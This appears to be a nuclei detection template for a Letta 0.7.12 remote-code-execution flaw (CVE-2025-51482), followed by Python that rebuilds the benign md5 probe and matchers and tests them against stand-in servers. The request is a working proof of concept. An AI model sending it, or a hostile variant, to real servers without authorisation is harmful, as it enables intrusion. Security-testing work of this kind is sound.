id: CVE-2025-51482

info:
  name: Letta 0.7.12 - Remote Code Execution
  author: RaghavArora14
  severity: high
  description: |
    Letta 0.7.12 is vulnerable to remote code execution via POST /v1/tools/run in letta.server.rest_api.routers.v1.tools.run_tool_from_source, allowing attackers to execute arbitrary Python and OS commands via crafted tool source code.
  impact: |
    Unauthenticated attackers can execute arbitrary Python code through crafted tool source code in the /v1/tools/run endpoint, achieving remote code execution.
  remediation: |
    Upgrade Letta to a version later than 0.7.12 that properly validates and sandboxes tool source code execution.
  reference:
    - https://www.gecko.security/blog/cve-2025-51482
    - https://github.com/letta-ai/letta/pull/2630
    - https://github.com/Kai-One001/Letta-CVE-2025-51482-RCE
    - https://nvd.nist.gov/vuln/detail/CVE-2025-51482
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2025-51482
    epss-score: 0.11996
    epss-percentile: 0.93905
    cwe-id: CWE-94
    cpe: cpe:2.3:a:letta:letta:0.7.12:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: letta
    product: letta
    fofa-query: title="Letta"
  tags: cve,cve2025,rce,letta,vkev

variables:
  num: "999999999"

http:
  - raw:
      - |
        POST /v1/tools/run HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "name": "nuclei",
          "args": {},
          "json_schema": {"type": "object", "properties": {}},
          "source_code": "def nuclei():\n import hashlib\n data='{{num}}'.encode('utf-8')\n return ''+hashlib.md5(data).hexdigest()"
        }

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{md5(num)}}'
          - 'tool_return":'
        condition: and

      - type: word
        part: content_type
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100be4f2e4b18daaf8243fdd7c44d33e97afe8056832213a986ee2a76f40325911a022100e8bc432952a9ef044b8788a4cab3a7df8152f428a42dd5fc88bd3583dd4ab631:922c64590222798bb761d5b6d8e72950
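The template above proves code execution without doing harm: the submitted tool only returns md5 of the `num` variable, and the matchers look for that digest next to the `tool_return":` key in a 200 JSON reply. The following Python is an added example, not part of the nuclei template or of the Letta project. It rebuilds the probe body and raw request the template sends, applies the same three matchers to a response, and runs the whole check offline against a hypothetical stand-in server that exec()s caller-supplied `source_code` (the CWE-94 behaviour the template detects); that stand-in, the patched stand-in, and the `hypothetical_*` names are assumptions for illustration and are not Letta's `run_tool_from_source`.

```python
# Added example: offline reproduction of the nuclei template's probe and
# matcher logic for CVE-2025-51482. Not code from the template or from Letta.
import hashlib
import json

ENDPOINT = "/v1/tools/run"
TOOL_NAME = "nuclei"          # tool name used by the template
DEFAULT_NUM = "999999999"     # the template's `num` variable


def build_probe(num: str = DEFAULT_NUM) -> dict:
    """JSON body the template POSTs. The tool only returns md5(num), so a
    matching response proves source_code ran server-side without side effects."""
    source = (
        f"def {TOOL_NAME}():\n"
        f"    import hashlib\n"
        f"    data='{num}'.encode('utf-8')\n"
        f"    return ''+hashlib.md5(data).hexdigest()"
    )
    return {
        "name": TOOL_NAME,
        "args": {},
        "json_schema": {"type": "object", "properties": {}},
        "source_code": source,
    }


def render_raw_request(host: str, num: str = DEFAULT_NUM) -> str:
    """Raw HTTP/1.1 request equivalent to the template's `raw` block (CRLF endings)."""
    body = json.dumps(build_probe(num))
    return (
        f"POST {ENDPOINT} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Content-Type: application/json\r\n"
        f"Content-Length: {len(body)}\r\n\r\n{body}"
    )


def expected_marker(num: str = DEFAULT_NUM) -> str:
    """Value the template's {{md5(num)}} matcher expands to."""
    return hashlib.md5(num.encode("utf-8")).hexdigest()


def is_vulnerable(status: int, content_type: str, body: str, num: str = DEFAULT_NUM) -> bool:
    """matchers-condition: and -- status 200, JSON content type, and a body
    containing both the md5 marker and the 'tool_return":' key."""
    return (
        status == 200
        and "application/json" in content_type
        and expected_marker(num) in body
        and 'tool_return":' in body
    )


def hypothetical_vulnerable_server(request_json: dict) -> tuple:
    """Hypothetical stand-in (NOT Letta code) for an endpoint that trusts
    `source_code`: exec() the submitted module and call the named tool.
    Returns (status, content_type, body) in the shape is_vulnerable() expects."""
    namespace: dict = {}
    exec(request_json["source_code"], namespace)  # the CWE-94 sink
    result = namespace[request_json["name"]](**request_json["args"])
    body = json.dumps({"tool_return": result})
    return 200, "application/json", body


def hypothetical_patched_server(request_json: dict) -> tuple:
    """Hypothetical stand-in for a fixed endpoint that refuses to execute
    caller-supplied source; a non-200, non-JSON reply fails every matcher."""
    return 403, "text/plain", "tool source execution is not permitted"


if __name__ == "__main__":
    probe = build_probe()
    print(render_raw_request("letta.example"))
    print("vulnerable:", is_vulnerable(*hypothetical_vulnerable_server(probe)))  # True
    print("patched:   ", is_vulnerable(*hypothetical_patched_server(probe)))     # False
```

To use the check against a real host, send the output of `render_raw_request()` (or the dict from `build_probe()` via any HTTP client) and pass the status, Content-Type header and body into `is_vulnerable()`. Because the marker is md5 of a value you choose, a true result cannot be produced by a server that merely echoes the request back; it requires the submitted Python to have run.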